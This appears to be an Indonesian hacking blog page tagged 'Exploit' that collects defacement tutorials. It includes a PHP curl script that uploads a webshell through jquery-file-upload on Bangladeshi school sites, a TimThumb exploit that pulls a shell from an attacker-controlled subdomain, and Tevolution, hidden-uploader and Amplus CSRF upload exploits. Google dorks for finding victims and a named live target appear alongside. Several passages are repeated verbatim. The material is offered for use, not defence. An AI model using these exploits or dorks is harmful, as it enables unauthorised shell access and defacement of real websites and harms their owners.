Showing posts with label Exploit. Show all posts
Deface website sekolah Bangladesh
hallo.
kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.
Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.
dork: Developed by exdmania
script:
kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.
Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.
dork: Developed by exdmania
script:
<?phpPOC:
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/
Tutorial Deface Dengan TimThumb 1.14
Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,,
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "
Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti "
no image specified
Query String :
TimThumb version : 1.19
berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version .
Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan
1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP ..
Alat dan Bahan :
1. Subdomain yang terintegrasi website berikut
: picasa.com
: blogger.com
: flixr.com
sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "
, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory
public_html / httpdocs / www / dan macam² ..
2. Otak dan pantang menyerah ;) ..
Exploit :
1. Kali ini saya dah punya target sendiri ,, lihat gambar ..
2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar ..
3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh :" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..
4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php " , lihat di bawah ,,5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,,
hehe sory yak uploadernya punya pak deb~X ,,
Source : Extreme Crew
post diambil dari SINI
wordpress Plugins Tevolution
Dork :inur:plugins/tevolution < Bisa di kembangin
Exploit:wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
Array Filedata , ataugak pake mass exploiternya agus
localheart.esy.es/public_html/public_html/tools/ <auto exploit
Bypass shell , shell.php4 ,
Shell akses / wp-content/uploads/2016/05/shell.php
Btw di site itu kalo search di google image ada yang tevolution-directory , atau sebagainya langsung exploit aja pake exploit di atas
Author : Stupidc0de
GreetZ : Sanjungan jiwa - indoxploit
http://ezeebe.com/wp-content/plugins/Tev...upload.php < Live target
Vuln site : BLANK!
Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar
Exploit:wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
Array Filedata , ataugak pake mass exploiternya agus
localheart.esy.es/public_html/public_html/tools/ <auto exploit
Bypass shell , shell.php4 ,
Shell akses / wp-content/uploads/2016/05/shell.php
Btw di site itu kalo search di google image ada yang tevolution-directory , atau sebagainya langsung exploit aja pake exploit di atas
Author : Stupidc0de
GreetZ : Sanjungan jiwa - indoxploit
http://ezeebe.com/wp-content/plugins/Tev...upload.php < Live target
Vuln site : BLANK!
Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar
Hidden Uploader
- intitleayPal Account Checker
- intitleayPal Email Valid Checker
Exploit : /function.php?76=browser
Kalo emang ada hidden uploadernya nanti bakal muncul uploader disitu ,
Shell aksesnya , site.coli/shell.php / site.co.li/path/shell.php
Btw path itu yang biasa ada didepan sitenya , jembut/wp/ < wpnya path dari wordpress , jadi kalo mau exploit didepan pathnya
Sekian dan terimagaji
- intitleayPal Email Valid Checker
Exploit : /function.php?76=browser
Kalo emang ada hidden uploadernya nanti bakal muncul uploader disitu ,
Shell aksesnya , site.coli/shell.php / site.co.li/path/shell.php
Btw path itu yang biasa ada didepan sitenya , jembut/wp/ < wpnya path dari wordpress , jadi kalo mau exploit didepan pathnya
Sekian dan terimagaji
Sumber : Post diambil dari Forum IndoXploit yang post oleh Condet6etar
Wordpress Amplus Themes CSRF File Upload Vulnerability
#Title : Wordpress Amplus Themes CSRF File Upload Vulnerability
#Author : DevilScreaM
#Date : 11/17/2013 - 17 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themeforest.net
#Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:wp-content/themes/amplus
CSRF File Upload Vulnerability
Exploit & POC :
http://site-target/wp-content/themes/amplus/functions/upload-handler.php
Script :
<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
File Access :
http://site-target/uploads/[years]/[month]/your_shell.php
Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
Subscribe to:
Posts (Atom)